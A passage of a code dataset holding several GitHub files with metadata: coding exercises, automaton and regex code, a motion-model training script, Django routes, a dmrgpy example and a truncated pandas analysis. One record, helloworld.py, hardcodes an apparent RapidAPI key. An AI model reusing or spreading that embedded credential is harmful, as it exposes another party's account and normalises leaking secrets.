obj.pick()","repo_name":"songc/LeetCode-Pyhton","sub_path":"leetcode497.py","file_name":"leetcode497.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21958938808","text":"import requests\n\nurl = \"https://covid-193.p.rapidapi.com/countries\"\n\nheaders = {\n\t\"X-RapidAPI-Key\": \"04e141f621mshff42f59e4293c77p1d374djsne10510899cae\",\n\t\"X-RapidAPI-Host\": \"covid-193.p.rapidapi.com\"\n}\n\nresponse = requests.request(\"GET\", url, headers=headers)\n\nprint(response.text)","repo_name":"Beny07/TP1_GR01","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4284223788","text":"import random\nimport torch\nfrom torch.utils.data.dataloader import DataLoader\nfrom motion_data import TestMotionData, TrainMotionData\nimport pymotion.rotations.quat as quat\nfrom pymotion.ops.skeleton import from_root_dual_quat\nfrom pymotion.io.bvh import BVH\nimport numpy as np\nfrom train_data import Train_Data\nfrom generator_architecture import Generator_Model\nfrom ik_architecture import IK_Model\nimport time\nimport argparse\nimport os\nimport eval_metrics\n\nscale = 1\n\n# Train Modes\nGENERATOR = 1\nIK = 2\n\nparam = {\n \"batch_size\": 256,\n \"epochs\": 500,\n \"kernel_size_temporal_dim\": 15,\n \"neighbor_distance\": 2,\n \"stride_encoder_conv\": 2,\n \"learning_rate\": 1e-4,\n \"lambda_root\": 10,\n \"lambda_ee\": 10 / scale,\n \"lambda_ee_reg\": 1 / scale,\n \"sparse_joints\": [\n 0, # first should be root (as assumed by loss.py)\n 4, # left foot\n 8, # right foot\n 13, # head\n 17, # left hand\n 21, # right hand\n ],\n \"window_size\": 64,\n \"window_step\": 16,\n \"seed\": 2222,\n}\n\nassert param[\"kernel_size_temporal_dim\"] % 2 == 1\n\n\ndef main(args):\n # Set seed\n torch.manual_seed(param[\"seed\"])\n random.seed(param[\"seed\"])\n np.random.seed(param[\"seed\"])\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(\"Using device:\", device)\n # Additional Info when using cuda\n if device.type == \"cuda\":\n print(torch.cuda.get_device_name(0))\n\n # Prepare Data\n train_eval_dir = args.data_path\n # check if train and eval directories exist\n train_dir = os.path.join(train_eval_dir, \"train\")\n if not 
os.path.exists(train_dir):\n raise ValueError(\"train directory does not exist\")\n train_files = os.listdir(train_dir)\n eval_dir = os.path.join(train_eval_dir, \"eval\")\n if not os.path.exists(eval_dir):\n raise ValueError(\"eval directory does not exist\")\n eval_files = os.listdir(eval_dir)\n train_dataset = TrainMotionData(param, scale, device)\n eval_dataset = TestMotionData(param, scale, device)\n reference_parents = None # used to make sure all bvh have the same structure\n # Train Files\n for filename in train_files:\n if filename[-4:] == \".bvh\":\n rots, pos, parents, offsets, _ = get_info_from_bvh(\n get_bvh_from_disk(train_dir, filename)\n )\n if reference_parents is None:\n reference_parents = parents.copy()\n assert (\n reference_parents == parents\n ) # make sure all bvh have the same structure\n # Train Dataset\n train_dataset.add_motion(\n offsets,\n pos[:, 0, :], # only global position\n rots,\n parents,\n )\n # Once all train files are added, compute the means and stds and normalize\n train_dataset.normalize()\n eval_dataset.set_means_stds(train_dataset.means, train_dataset.stds)\n # Eval Files\n for filename in eval_files:\n if filename[-4:] == \".bvh\":\n rots, pos, parents, offsets, bvh = get_info_from_bvh(\n get_bvh_from_disk(eval_dir, filename)\n )\n assert (\n reference_parents == parents\n ) # make sure all bvh have the same structure\n # Eval Dataset\n eval_dataset.add_motion(\n offsets,\n pos[:, 0, :], # only global position\n rots,\n parents,\n bvh,\n filename,\n )\n # Once all eval files are added, normalize\n eval_dataset.normalize()\n\n train_dataloader = DataLoader(train_dataset, param[\"batch_size\"], shuffle=False)\n\n # Create Models\n train_data = Train_Data(device, param)\n generator_model = Generator_Model(device, param, reference_parents, train_data).to(\n device\n )\n if args.train_mode & IK != 0:\n ik_model = IK_Model(device, param, reference_parents, train_data).to(device)\n train_data.set_means(train_dataset.means[\"dqs\"])\n train_data.set_stds(train_dataset.stds[\"dqs\"])\n\n # Load Models\n _, generator_path, ik_path = get_model_paths(args.name, train_eval_dir)\n if args.train_mode & GENERATOR == 0 or (args.load and args.train_mode & IK != 0):\n # Generator is always needed with IK, load it if not training it\n load_model(generator_model, generator_path, train_data, device)\n if args.train_mode & IK != 0 and args.load:\n load_model(ik_model, ik_path, train_data, device)\n\n if (args.train_mode & GENERATOR == 0 or args.train_mode & IK == 0) and args.load:\n # Check previous best evaluation loss\n results = evaluate_generator(generator_model, train_data, eval_dataset)\n if args.train_mode & IK != 0:\n results_ik = evaluate_ik(ik_model, results, train_data, eval_dataset)\n results = results_ik\n mpjpe, mpeepe = eval_save_result(\n results,\n train_dataset.means,\n train_dataset.stds,\n eval_dir,\n device,\n save=False,\n )\n best_evaluation = mpjpe + mpeepe\n else:\n best_evaluation = float(\"inf\")\n # Training Loop\n start_time = time.time()\n for epoch in range(param[\"epochs\"]):\n avg_train_loss = 0.0\n for step, (denorm_motion, norm_motion) in enumerate(train_dataloader):\n # Forward\n train_data.set_offsets(norm_motion[\"offsets\"], denorm_motion[\"offsets\"])\n train_data.set_motions(\n norm_motion[\"dqs\"],\n norm_motion[\"displacement\"],\n )\n if args.train_mode & GENERATOR != 0:\n generator_model.train()\n if args.train_mode & GENERATOR != 0 or args.train_mode & IK != 0:\n res_decoder = generator_model.forward()\n if args.train_mode 
& IK != 0:\n ik_model.train()\n ik_model.forward(res_decoder)\n # Loss\n loss = 0.0\n if args.train_mode & GENERATOR != 0:\n loss_generator = generator_model.optimize_parameters()\n loss = loss_generator.item()\n if args.train_mode & IK != 0:\n loss_ik = ik_model.optimize_parameters(res_decoder)\n loss += loss_ik.item()\n avg_train_loss += loss\n # Evaluate & Print\n if step == len(train_dataloader) - 1:\n if args.train_mode & GENERATOR != 0 or args.train_mode & IK != 0:\n results = evaluate_generator(\n generator_model, train_data, eval_dataset\n )\n if args.train_mode & IK != 0:\n results_ik = evaluate_ik(\n ik_model,\n results,\n train_data,\n eval_dataset,\n )\n results = results_ik\n mpjpe, mpeepe = eval_save_result(\n results,\n train_dataset.means,\n train_dataset.stds,\n eval_dir,\n device,\n save=False,\n )\n evaluation_loss = mpjpe + mpeepe\n # If best, save model\n was_best = False\n if evaluation_loss < best_evaluation:\n save_model(\n generator_model if args.train_mode & GENERATOR != 0 else None,\n ik_model if args.train_mode & IK != 0 else None,\n train_dataset,\n args.name,\n train_eval_dir,\n )\n best_evaluation = evaluation_loss\n was_best = True\n # Print\n avg_train_loss /= len(train_dataloader)\n if args.train_mode & GENERATOR != 0 or args.train_mode & IK != 0:\n print(\n \"Epoch: {} - Train Loss: {:.4f} - Eval Loss: {:.4f} - MPJPE: {:.4f} - MPEEPE: {:.4f}\".format(\n epoch, avg_train_loss, evaluation_loss, mpjpe, mpeepe\n )\n + (\"*\" if was_best else \"\")\n )\n\n end_time = time.time()\n print(\"Training Time:\", end_time - start_time)\n\n # Load Best Model -> Save and/or Evaluate\n if args.train_mode & GENERATOR != 0 or args.train_mode & IK != 0:\n load_model(generator_model, generator_path, train_data, device)\n results = evaluate_generator(generator_model, train_data, eval_dataset)\n if args.train_mode & IK != 0:\n load_model(ik_model, ik_path, train_data, device)\n results_ik = evaluate_ik(ik_model, results, train_data, eval_dataset)\n results = results_ik\n\n mpjpe, mpeepe = eval_save_result(\n results, train_dataset.means, train_dataset.stds, eval_dir, device\n )\n evaluation_loss = mpjpe + mpeepe\n\n print(\"Evaluate Loss: {}\".format(evaluation_loss))\n if args.train_mode & (GENERATOR | IK) != 0:\n print(\"Mean Per Joint Position Error: {}\".format(mpjpe))\n print(\"Mean End Effector Position Error: {}\".format(mpeepe))\n\n\ndef eval_save_result(results, train_means, train_stds, eval_dir, device, save=True):\n # Save Result\n array_mpjpe = np.empty((len(results),))\n array_mpeepe = np.empty((len(results),))\n for step, (res, bvh, filename) in enumerate(results):\n if save:\n eval_path, eval_filename = result_to_bvh(\n res, train_means, train_stds, bvh, filename\n )\n # Evaluate Positional Error\n mpjpe, mpeepe = eval_metrics.eval_pos_error(\n get_bvh_from_disk(eval_dir, filename),\n get_bvh_from_disk(eval_path, eval_filename),\n device,\n )\n else:\n result_to_bvh(res, train_means, train_stds, bvh, None, save=False)\n # Evaluate Positional Error\n mpjpe, mpeepe = eval_metrics.eval_pos_error(\n get_bvh_from_disk(eval_dir, filename),\n bvh,\n device,\n )\n\n array_mpjpe[step] = mpjpe\n array_mpeepe[step] = mpeepe\n\n return np.mean(array_mpjpe), np.mean(array_mpeepe)\n\n\ndef load_model(model, model_path, train_data, device):\n model_name = os.path.basename(model_path)[: -len(\".pt\")]\n assert model_name == \"generator\" or model_name == \"ik\"\n if model_name == \"generator\":\n data_path = model_path[: -len(\"generator.pt\")] + \"data.pt\"\n checkpoint = 
torch.load(model_path, map_location=device)\n model.load_state_dict(checkpoint[\"model_state_dict\"])\n elif model_name == \"ik\":\n data_path = model_path[: -len(\"ik.pt\")] + \"data.pt\"\n checkpoint = torch.load(model_path, map_location=device)\n model.load_state_dict(checkpoint[\"model_state_dict\"])\n data = torch.load(data_path, map_location=device)\n means = data[\"means\"]\n stds = data[\"stds\"]\n train_data.set_means(means[\"dqs\"])\n train_data.set_stds(stds[\"dqs\"])\n return means, stds\n\n\ndef get_model_paths(name, train_eval_dir):\n model_name = (\n \"model_\" + name + \"_\" + os.path.basename(os.path.normpath(train_eval_dir))\n )\n model_dir = os.path.join(\"models\", model_name)\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n\n data_path = os.path.join(model_dir, \"data.pt\")\n generator_path = os.path.join(model_dir, \"generator.pt\")\n ik_path = os.path.join(model_dir, \"ik.pt\")\n return data_path, generator_path, ik_path\n\n\ndef save_model(\n generator_model,\n ik_model,\n train_dataset,\n name,\n train_eval_dir,\n):\n data_path, generator_path, ik_path = get_model_paths(name, train_eval_dir)\n\n if train_dataset is not None:\n torch.save(\n {\n \"means\": train_dataset.means,\n \"stds\": train_dataset.stds,\n },\n data_path,\n )\n if generator_model is not None:\n torch.save(\n {\n \"model_state_dict\": generator_model.state_dict(),\n },\n generator_path,\n )\n if ik_model is not None:\n torch.save(\n {\n \"model_state_dict\": ik_model.state_dict(),\n },\n ik_path,\n )\n\n\ndef get_bvh_from_disk(path, filename):\n path = os.path.join(path, filename)\n bvh = BVH()\n bvh.load(path)\n return bvh\n\n\ndef get_info_from_bvh(bvh):\n rot_roder = np.tile(bvh.data[\"rot_order\"], (bvh.data[\"rotations\"].shape[0], 1, 1))\n rots = quat.unroll(\n quat.from_euler(np.radians(bvh.data[\"rotations\"]), order=rot_roder),\n axis=0,\n )\n rots = quat.normalize(rots) # make sure all quaternions are unit quaternions\n pos = bvh.data[\"positions\"]\n parents = bvh.data[\"parents\"]\n parents[0] = 0 # BVH sets root as None\n offsets = bvh.data[\"offsets\"]\n offsets[0] = np.zeros(3) # force to zero offset for root joint\n return rots, pos, parents, offsets, bvh\n\n\ndef evaluate_generator(generator_model, train_data, dataset, sparse_motions=None):\n # WARNING: means and stds for the model are not set in this function... they should be set before\n generator_model.eval()\n results = []\n with torch.no_grad():\n for index in range(dataset.get_len()):\n norm_motion = dataset.get_item(index)\n train_data.set_offsets(\n norm_motion[\"offsets\"].unsqueeze(0),\n norm_motion[\"denorm_offsets\"].unsqueeze(0),\n )\n train_data.set_motions(\n norm_motion[\"dqs\"].unsqueeze(0),\n norm_motion[\"displacement\"].unsqueeze(0),\n )\n if sparse_motions is not None:\n train_data.set_sparse_motion(sparse_motions[index])\n res = generator_model.forward()\n bvh, filename = dataset.get_bvh(index)\n results.append((res, bvh, filename))\n return results\n\n\ndef evaluate_ik(ik_model, results_decoder, train_data, dataset):\n # WARNING: means and stds for the model are not set in this function... 
they should be set before\n ik_model.eval()\n results = []\n with torch.no_grad():\n for index in range(dataset.get_len()):\n norm_motion = dataset.get_item(index)\n train_data.set_offsets(\n norm_motion[\"offsets\"].unsqueeze(0),\n norm_motion[\"denorm_offsets\"].unsqueeze(0),\n )\n train_data.set_motions(\n norm_motion[\"dqs\"].unsqueeze(0),\n norm_motion[\"displacement\"].unsqueeze(0),\n )\n res = ik_model.forward(results_decoder[index][0])\n bvh, filename = dataset.get_bvh(index)\n results.append((res, bvh, filename))\n return results\n\n\ndef run_set_data(train_data, dataset):\n with torch.no_grad():\n norm_motion = dataset.get_item()\n train_data.set_offsets(\n norm_motion[\"offsets\"].unsqueeze(0),\n norm_motion[\"denorm_offsets\"].unsqueeze(0),\n )\n train_data.set_motions(\n norm_motion[\"dqs\"].unsqueeze(0),\n norm_motion[\"displacement\"].unsqueeze(0),\n )\n\n\ndef run_generator(model):\n # WARNING: means and stds for the model are not set in this function... they should be set before\n model.eval()\n with torch.no_grad():\n res_decoder = model.forward()\n return res_decoder\n\n\ndef run_ik(model, res_decoder, frame=None):\n # WARNING: means and stds for the model are not set in this function... they should be set before\n model.eval()\n with torch.no_grad():\n res = model.forward(res_decoder, frame)\n return res\n\n\ndef result_to_bvh(res, means, stds, bvh, filename, save=True):\n res = res.permute(0, 2, 1)\n res = res.flatten(0, 1)\n res = res.cpu().detach().numpy()\n # get dqs and displacement\n dqs = res\n # denormalize\n dqs = dqs * stds[\"dqs\"].cpu().numpy() + means[\"dqs\"].cpu().numpy()\n # get rotations and translations from dual quatenions\n dqs = dqs.reshape(dqs.shape[0], -1, 8)\n _, rots = from_root_dual_quat(dqs, np.array(bvh.data[\"parents\"]))\n # quaternions to euler\n rot_roder = np.tile(bvh.data[\"rot_order\"], (rots.shape[0], 1, 1))\n rotations = np.degrees(quat.to_euler(rots, order=rot_roder))\n bvh.data[\"rotations\"] = rotations\n # positions\n positions = bvh.data[\"positions\"][: rotations.shape[0]]\n bvh.data[\"positions\"] = positions\n # save\n bvh.data[\"parents\"][0] = None # BVH sets root as None\n path = None\n if save:\n path = \"data\"\n filename = \"eval_\" + filename\n bvh.save(os.path.join(path, filename), bvh.data)\n return path, filename\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Train Motion Upsampling Network\")\n parser.add_argument(\n \"data_path\",\n type=str,\n help=\"path to data directory containing one or multiple .bvh for training, last .bvh is used as test data\",\n )\n parser.add_argument(\n \"name\",\n type=str,\n help=\"name of the experiment, used to save the model and the logs\",\n )\n parser.add_argument(\n \"train_mode\",\n type=str.lower,\n choices=[\"generator\", \"ik\", \"all\"],\n )\n parser.add_argument(\n \"--load\",\n action=\"store_true\",\n help=\"load the model(s) from a checkpoint\",\n )\n args = parser.parse_args()\n if args.train_mode == \"generator\":\n args.train_mode = GENERATOR\n elif args.train_mode == \"ik\":\n args.train_mode = IK\n elif args.train_mode == \"all\":\n args.train_mode = GENERATOR | IK\n main(args)\n","repo_name":"UPC-ViRVIG/SparsePoser","sub_path":"python/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17827,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"12050342645","text":"#!/usr/bin/env python3\n\"\"\"\nRead a regular expression and returns:\n * YES if word 
is recognized\n * NO if word is rejected\"\"\"\n\nfrom typing import Set, List\nfrom automaton import Automaton, EPSILON, State, error, warn, RegExpReader\nimport sys\nimport pdb # for debugging\n\n##################\n\ndef is_deterministic(a:Automaton)->bool:\n for(source,symb,dest) in a.transitions:\n for (source1, symb1, dest1) in a.transitions:\n if source == source1 and symb == symb1 and dest!=dest1 or symb == EPSILON :\n return False\n return True\n \n##################\n \ndef recognizes(a:'Automaton', word:str)->bool:\n this_state = str(a.initial) \n if word == EPSILON and this_state in a.acceptstates: \n return True\n for l in word :\n if l not in a.statesdict[this_state].transitions:\n return False\n this_state = str(list(a.statesdict[this_state].transitions[l])[0])\n if (this_state not in a.acceptstates):\n return False\n return True \n \n \n##################\n\ndef determinise(a:Automaton):\n remove_epsilon_transitions(a)\n trans_reduction(a)\n \n##################\n\ndef epsilon_transitions(a:Automaton):\n list_epsilon_transitions=[]\n for(source,symb,dest) in a.transitions:\n if symb == EPSILON :\n trans = source,symb,dest\n list_epsilon_transitions.append(trans)\n return list_epsilon_transitions\n\n\n#################\n\n\ndef remove_epsilon_transitions (a :Automaton) : \n transitions = a.transitions\n e_transitions = epsilon_transitions(a)\n for trans in transitions:\n for trans2 in e_transitions:\n if trans[0] == trans2[2]: \n a.add_transition(trans2[0], trans[1], trans[2]) \n a.remove_transition(trans2[0], trans2[1], trans2[2])\n a.make_accept(trans[2])\n \n#####################\n\ndef trans_reduction(a) :\n new_a = Automaton(\"det\")\n new_states = [a.initial.name] \n while len(new_states) !=0:\n for symb in a.alphabet :\n dest = set([]) \n for trans in a.transitions :\n if trans[0] in new_states[0] and trans[1]== symb: \n t =( trans[2] ) \n dest = dest.union(set([t]))\n if dest!= set ([]):\n new_a.add_transition(str(new_states[0]),symb, str(dest)) \n for state in a.acceptstates:\n if state in dest :\n new_a.make_accept(str(dest)) \n if dest not in new_states :\n new_states.append(dest)\n new_states.pop(0)\n return new_a \n##################### \n\n\n##################\n\n\ndef kleene(a1:Automaton)->Automaton:\n a1star = a1.deepcopy()\n a1star.name = \"a1star\"\n \n for state in a1star.acceptstates:\n a1star.add_transition(state,EPSILON,a1star.initial.name)\n a1star.add_transition(nouvel_etat(a1),EPSILON,a1.initial.name)\n a1star.initial = a1star.statesdict[nouvel_etat(a1)]\n a1star.make_accept(nouvel_etat(a1))\n\n return a1star\n\n\n##################\n\ndef nouvel_etat(a1:Automaton)->str:\n \"\"\"Find a new state name greater than the max in `a1`\"\"\"\n maxstate = -1\n for a in a1.states :\n try :\n maxstate = max(int(a), maxstate)\n except ValueError:\n pass\n return str(maxstate + 1)\n##################\n\ndef concat(a1:Automaton, a2:Automaton)->Automaton:\n a1star_a2 = a1.deepcopy()\n a1star_a2.name = \"a1star_a2\"\n nom_nouvel_etat = nouvel_etat(a1star_a2)\n \n for trans in a2.transitions:\n if trans[0] == a2.initial.name: \n a1star_a2.add_transition(nom_nouvel_etat, trans[1], str(int(trans[2]) + int(nom_nouvel_etat)))\n else :\n a1star_a2.add_transition(str(int(trans[0]) +int(nom_nouvel_etat)),trans[1], str(int(trans[2]) +int(nom_nouvel_etat)))\n \n for s in a2.states : \n if s in a2.acceptstates : \n a1star_a2.make_accept(str(int(s)+ int(nom_nouvel_etat))) \n for s in a1star_a2.acceptstates:\n if int(s[0])< int(nom_nouvel_etat):\n 
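# (descriptive comment added for clarity: accept states inherited from a1 get an epsilon-transition into a2's shifted initial state, chaining the two automata in sequence)\n 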
a1star_a2.add_transition(s, EPSILON, nom_nouvel_etat)\n for s in a1star_a2.acceptstates :\n if int(s[0]) < int(nom_nouvel_etat):\n a1star_a2.make_accept(s, False)\n return a1star_a2 \n\n##################\n\ndef union(a1:Automaton, a2:Automaton)->Automaton:\n a1star_a2_or_a3 = a1.deepcopy()\n a1star_a2_or_a3.name = \"a1star_a2_or_a3\"\n nom_nouvel_etat = nouvel_etat(a1star_a2_or_a3)\n for s in a2.transitions:\n if s[0] == a2.initial.name:\n a1star_a2_or_a3.add_transition(nom_nouvel_etat, s[1], str(int(s[2])+ 1 + int(nom_nouvel_etat)))\n else:\n a1star_a2_or_a3.add_transition(str(int(s[0])+ 1 + int(nom_nouvel_etat)),s[1], str(int(s[2])+ 1 + int(nom_nouvel_etat) ))\n nom_nouvel_etat2 = nouvel_etat(a1star_a2_or_a3)\n a1star_a2_or_a3.add_transition(nom_nouvel_etat2,EPSILON,a1star_a2_or_a3.initial.name)\n a1star_a2_or_a3.add_transition(nom_nouvel_etat2,EPSILON,nom_nouvel_etat)\n a1star_a2_or_a3.initial=a1star_a2_or_a3.statesdict[nom_nouvel_etat2]\n \n for s in a2.states :\n if s in a2.acceptstates :\n a1star_a2_or_a3.make_accept(str(int(s)+ int(nom_nouvel_etat)))\n \n\n return a1star_a2_or_a3\n \n##################\n \ndef regexp_to_automaton(re:str)->Automaton:\n \"\"\"\n Moore's algorithm: regular expression `re` -> non-deterministic automaton\n \"\"\"\n postfix = RegExpReader(regexp).to_postfix()\n stack:List[Automaton] = []\n \n for p in postfix:\n if p!= \"*\" and p != \"+\" and p!= \".\" :\n a = Automaton(p)\n a.add_transition(\"0\", p ,\"1\")\n a.make_accept(\"1\")\n stack.append(a)\n \n elif p == \"+\":\n a1 = stack.pop();\n a2 = stack.pop();\n stack.append(union(a2, a1))\n \n \n elif p ==\"*\":\n a = stack.pop();\n stack.append(kleene(a))\n \n elif p == \".\":\n a1 = stack.pop();\n a2 = stack.pop();\n stack.append(concat(a2, a1))\n \n return stack[0]\n \n##################\n\nif __name__ == \"__main__\" :\n\n if len(sys.argv) != 3:\n usagestring = \"Usage: {} \"\n error(usagestring.format(sys.argv[0]))\n\n regexp = sys.argv[1] \n word = sys.argv[2]\n\n a = regexp_to_automaton(regexp)\n determinise(a)\n if recognizes(a, word):\n print(\"YES\")\n else:\n print(\"NO\")\n\n","repo_name":"Tecna3000/Licence2-Informatique","sub_path":"S3/Automate finis/automatefinistp1/tp4automates.py","file_name":"tp4automates.py","file_ext":"py","file_size_in_byte":6238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28289754276","text":"\"\"\"\nQuestions Marks\n\nHave the function QuestionsMarks(str) take the str string parameter, which will\ncontain single digit numbers, letters, and question marks, and check if there\nare exactly 3 question marks between every pair of two numbers that add up to 10.\n\nIf so, then your program should return the string true, otherwise it should\nreturn the string false. 
If there aren't any two numbers that add up to 10 in\nthe string, then your program should return false as well.\n\nFor example: if str is \"arrb6???4xxbl5???eee5\" then your program should return\n'true' because there are exactly 3 question marks between 6 and 4, and 3\nquestion marks between 5 and 5 at the end of the string.\n\nExamples\n\nInput: \"aa6?9\"\nOutput: false\n\nInput: \"acc?7??sss?3rr1??????5\"\nOutput: true\n\"\"\"\ndef QuestionsMarks(strParam):\n prev = None # last digit seen so far\n count = 0 # question marks since the last digit\n found = False # saw at least one pair summing to 10\n for ch in strParam:\n if ch in '0123456789':\n d = int(ch)\n if prev is not None and prev + d == 10:\n # every pair summing to 10 must have exactly 3 question marks between them\n if count != 3:\n return 'false'\n found = True\n prev = d\n count = 0\n elif ch == '?':\n count += 1\n\n return 'true' if found else 'false'\n\nif __name__ == '__main__':\n input = \"aa6?9\"\n print(QuestionsMarks(input))\n # Output: false\n\n input = \"acc?7??sss?3rr1??????5\"\n print(QuestionsMarks(input))\n # Output: true\n","repo_name":"vivamoto/challenges","sub_path":"questions_marks/question_marks.py","file_name":"question_marks.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28612226016","text":"import bisect\r\nimport time\r\n\r\ndef solution(info, query):\r\n t = time.time()\r\n ans = []\r\n\r\n infos = {}\r\n\r\n tmp = []\r\n for item in info:\r\n item = item.split()\r\n k, score = tuple(item[:4]), int(item[-1])\r\n tmp.append((k, score))\r\n\r\n tmp.sort(key=lambda x: x[1])\r\n\r\n for item in tmp:\r\n k, score = item\r\n if k not in infos:\r\n infos[k] = []\r\n infos[k].append(score)\r\n\r\n for q in query:\r\n q = q.split()\r\n q = list(filter(lambda x: x != 'and', q))\r\n q_score = int(q[-1])\r\n q = q[:-1]\r\n\r\n q_k = list(infos.keys())\r\n\r\n for current_q in q:\r\n if current_q == '-':\r\n continue\r\n q_k = list(filter(lambda x: current_q in x, q_k))\r\n\r\n q_infos = [infos[x] for x in q_k]\r\n q_result = 0\r\n\r\n for scores in q_infos:\r\n # idx = bisect.bisect_left(scores, q_score)\r\n # count = len(scores) - idx\r\n # q_result += count\r\n s = 0\r\n e = len(scores) - 1\r\n m = (e + s) // 2\r\n while True:\r\n if q_score <= scores[m]:\r\n e = m\r\n else:\r\n s = m + 1\r\n if m == ((e + s) // 2):\r\n q_result += len(scores[s:])\r\n break\r\n m = (e + s) // 2\r\n\r\n ans.append(q_result)\r\n\r\n return ans\r\n\r\ninfo = [\"java backend junior pizza 150\", \"python frontend senior chicken 210\",\"python frontend senior chicken 150\",\"cpp backend senior pizza 260\",\"java backend junior chicken 80\",\"python backend senior chicken 50\"]\r\nquery = [\"java and backend and junior and pizza 100\",\"python and frontend and senior and chicken 200\",\"cpp and - and senior and pizza 250\",\"- and backend and senior and - 150\",\"- and - and - and chicken 100\",\"- and - and - and - 150\"]\r\ns = time.time()\r\nprint(solution(info, query))\r\nprint('t-time: ', time.time() - s)","repo_name":"wonnerky/coteMaster","sub_path":"kakao/2021/3-sol2.py","file_name":"3-sol2.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73434018978","text":"from django.contrib import admin\nfrom django.urls import include, path, re_path\nfrom django.views.static import serve\nfrom django.conf import settings\n\nfrom drf_spectacular.views import (SpectacularAPIView, SpectacularRedocView, SpectacularSwaggerView)\n\nfrom . 
import views\n\n\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.index, name='index'),\n\n #authentication app\n path('role/', include('authentication.urls.role_urls')),\n path('permission/', include('authentication.urls.permission_urls')),\n path('user/', include('authentication.urls.user_urls')),\n path('employee/', include('authentication.urls.employee_urls')),\n\n #device app\n path('category/', include('device.urls.category_urls')),\n path('device/', include('device.urls.device_urls')),\n path('device_assign/', include('device.urls.device_assign_urls')),\n path('device_return/', include('device.urls.device_return_urls')),\n path('device_log/', include('device.urls.device_log_urls')),\n\n\n #swagger urls\n path('schema/', SpectacularAPIView.as_view(), name='schema'),\n path('schema/swagger-ui/', SpectacularSwaggerView.as_view(url_name='schema'), name='swagger-ui'),\n path('schema/redoc/', SpectacularRedocView.as_view(url_name='schema'), name='redoc'),\n\n\tre_path(r'^media/(?P<path>.*)$', serve, {'document_root': settings.MEDIA_ROOT}), \n re_path(r'^static/(?P<path>.*)$', serve, {'document_root': settings.STATIC_ROOT}),\n\n]\n","repo_name":"babor99/repliq_django_assessment","sub_path":"start_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73276511778","text":"# Add the root path of the dmrgpy library\nimport os ; import sys ; sys.path.append(os.getcwd()+'/../../src')\n\nimport numpy as np\nfrom dmrgpy import fermionchain\nns = 10 # number of spinful fermionic sites\nfc = fermionchain.Spinful_Fermionic_Chain(ns) # create the chain\nh = 0 # initialize Hamiltonian\n\nmu = -1.0 # chemical potential\n\n# first add the hoppings\nfor i in range(ns-1): # loop over sites\n h = h + fc.Cdagup[i]*fc.Cup[i+1]\n h = h + fc.Cdagdn[i]*fc.Cdn[i+1]\nh = h + h.get_dagger() # complex conjugate\n\n\n# now add the chemical potential\nfor i in range(ns): # loop over sites\n h = h + mu*fc.Cdagup[i]*fc.Cup[i]\n h = h + mu*fc.Cdagdn[i]*fc.Cdn[i]\n\n# setup the Hamiltonian\nfc.set_hamiltonian(h) # initialize Hamiltonian\n\ni = 0\ninds = range(ns)\nvevup = [fc.vev(fc.Cdagup[i]*fc.Cup[j]) for j in inds]\nvevdn = [fc.vev(fc.Cdagdn[i]*fc.Cdn[j]) for j in inds]\n\n\n# these lines would be for charge-charge correlator\n#vevup = [fc.vev(fc.Nup[i]*fc.Nup[j]) - fc.vev(fc.Nup[i])*fc.vev(fc.Nup[j]) for j in inds]\n#vevdn = [fc.vev(fc.Ndn[i]*fc.Ndn[j]) - fc.vev(fc.Ndn[i])*fc.vev(fc.Ndn[j]) for j in inds]\n\n\n\n\nvevs = np.array(vevup) + np.array(vevdn) # up + down\n\n\n\nimport matplotlib.pyplot as plt\nplt.plot(inds,vevs,marker=\"o\")\nplt.xlabel(\"Site j\")\nplt.ylabel(\"$\\\\langle C^\\\\dagger_i C_j \\\\rangle$\")\nplt.show()\n\n","repo_name":"joselado/dmrgpy","sub_path":"examples/fermionic_static_correlator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"34"} +{"seq_id":"12810824510","text":"from numpy import sum,random\nimport pandas as pd\nimport numpy as np\nimport math \nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n#loads all the data from the file\npodaci=pd.read_csv(\"test.csv\" )\n\n#puts zeros in the empty cells of the absences column\npodaci['absences'][podaci['absences'].eq(' ')]='0'\npodaci['absences']= pd.to_numeric(podaci['absences'])\n\n#mean value of the number of student absences\nE = 
sum(podaci['absences'])/len(podaci)\nprint(E)\nvar= sum((podaci['absences']-E)**2)/(len(podaci)-1)\nprint(var)\n\n#standard deviation \nsd=math.sqrt(var)\nprint(sd)\n\n#removes from the analysis the data points that lie outside the sd interval\npodaci1=podaci.drop(podaci[podaci.absences>(E+sd)].index)\n\n#mean number of absences for the students who attended the course\nE1= sum(podaci1['absences'])/len(podaci)\nvar1= sum((podaci1['absences']-E1)**2)/(len(podaci)-1)\nsd1=math.sqrt(var1)\npodaci2=pd.read_csv(\"test.csv\")\n\n#fills the empty places with the value that occurs most often\npodaci2['absences'][podaci2['absences'].eq(' ')]=int(E1)\npodaci2['absences']= pd.to_numeric(podaci2['absences'])\npodaci3=podaci2.drop(podaci2[podaci2.absences>(E+sd)].index)\nn=len(podaci3)\n\n#creating new columns in order to compute the probability that a student\n#gets a ten if they missed 10 or more hours of lectures\npodaci3[\"Ocjena_10\"]= np.where(podaci3['G3']>=16,1,0)\npodaci3[\"Puno_izostanaka\"]= 